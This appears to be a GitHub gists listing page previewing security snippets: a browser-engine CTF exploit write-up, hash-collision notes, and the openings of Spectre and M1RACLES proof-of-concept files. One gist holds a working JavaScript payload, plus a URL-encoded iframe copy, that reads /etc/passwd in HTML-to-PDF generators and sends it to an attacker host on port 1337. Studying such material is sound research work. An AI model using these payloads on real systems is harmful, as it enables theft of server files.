Skip to content

Instantly share code, notes, and snippets.

View eligrey's full-sized avatar
:octocat:

Eli Grey eligrey

:octocat:
View GitHub Profile
@dkdna
dkdna / writeup.md
Created January 22, 2023 10:27
bi0sCTF 2022 - b3typer

Short Writeup

  • Simple typer bug, range of BitAnd opcode is assumed to be [1, operand] when in reality it is [0, operand].
  • Use range assumptions to create unchecked integer underflow.
  • Bypass array bounds checks and obtain OOB write, overwrite size of array to get overlap.
  • Use double & object array overlap to create addrOf & fakeObj primitives.
  • Create overlapping fake array using StructureID leak to obtain arbitrary R/W.

The trick here is to convert a checkedAdd node to a normal Add node due to the incorrect range, and cause an unchecked integer underflow. When there is no underflow check, you can cause DFGIntegerRangeOptimization to make incorrect assumptions about bounds, and subsquently remove bounds checks (More details in the comments of the exploit).

MD5 Collision with CRC32 Preimage

Here's the scenario: We want to craft two different messages with the same MD5 hash, and a specific CRC32 checksum, simultaneously.

In other words, we want an MD5 collision attack and a CRC32 preimage attack.

This might seem like a contrived scenario, but it's exactly the one I faced while producing my PNG hashquine (Yes OK maybe that's also a contrived scenario, cut me some slack).

On its own, a CRC32 preimage attack is trivial. You can craft a 4-byte suffix that gives any message a specific checksum, calculated using a closed-form expression (which I am too lazy to derive, not even with assistance from Z3). It's not an attack per-se, since CRC32 was never meant to be cryptograpically secure in the first place.

// Keep the tab busy with audio.
const audioCtx = new AudioContext();
const gainNode = audioCtx.createGain();
gainNode.gain.value = 0.1;
gainNode.connect(audioCtx.destination);
const oscillatorNode = audioCtx.createOscillator();
oscillatorNode.type = "square";
/*
* m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1.
*
* This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register.
*
* Please visit m1racles.com for more information.
*
* Licensed under the MIT license.
*/
@lc
lc / poc.md
Created March 28, 2019 01:07
xhr to steal local files in HTML2PDF generators
x=new XMLHttpRequest;x.onload=function(){l=new XMLHttpRequest;l.open("GET","http://<ATTACKER-SERVER>:1337/"+encodeURIComponent(this.responseText));l.send();};x.open("GET","file:///etc/passwd");x.send();
<iframe src="javascript:%78%3d%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%3b%78%2e%6f%6e%6c%6f%61%64%3d%66%75%6e%63%74%69%6f%6e%28%29%7b%6c%3d%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%3b%6c%2e%6f%70%65%6e%28%22%47%45%54%22%2c%22%68%74%74%70%3a%2f%2f%78%2e%78%78%65%2e%73%68%3a%31%33%33%37%2f%22%2b%65%6e%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%74%68%69%73%2e%72%65%73%70%6f%6e%73%65%54%65%78%74%29%29%3b%6c%2e%73%65%6e%64%28%29%3b%7d%3b%78%2e%6f%70%65%6e%28%22%47%45%54%22%2c%22%66%69%6c%65%3a%2f%2f%2f%65%74%63%2f%70%61%73%73%77%64%22%29%3b%78%2e%73%65%6e%64%28%29%3b%0a"></iframe>
@MatthewWilkes
MatthewWilkes / automated.py
Created January 24, 2019 16:30
Extract deleted commits from a GitHub repo
import argparse
import os
import re
import subprocess
import tempfile
import requests
def get_repo(owner, repo):
@hasherezade
hasherezade / str_decoder.cpp
Last active December 20, 2018 18:11
Decoder for the obfuscated strings from malware: ef0cb0a1a29bcdf2b36622f72734aec8d38326fc8f7270f78bd956e706a5fd57
#include <iostream>
#include <Windows.h>
char* decode_string(const char *a1)
{
const BYTE *enc_str = (BYTE*)a1;
signed int enc_len = strlen(a1);
BYTE *v4;
int v5;
@dimaryaz
dimaryaz / dropbox_ext4.c
Created August 15, 2018 07:28
Dropbox ext4 hack
/*
* dropbox_ext4.c
*
* Compile like this:
* gcc -shared -fPIC -ldl -o libdropbox_ext4.so dropbox_ext4.c
*
* Run Dropbox like this:
* LD_PRELOAD=./libdropbox_ext4.so ~/.dropbox-dist/dropboxd
*/
@wdormann
wdormann / flash_killbit.reg
Last active June 1, 2021 15:03
Disable Flash ActiveX in all Windows versions (including 10)
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MicrosoftEdge\ActiveX Compatibility\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
"Compatibility Flags"=dword:00000400
@ErikAugust
ErikAugust / spectre.c
Last active August 2, 2024 01:59
Spectre example code
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif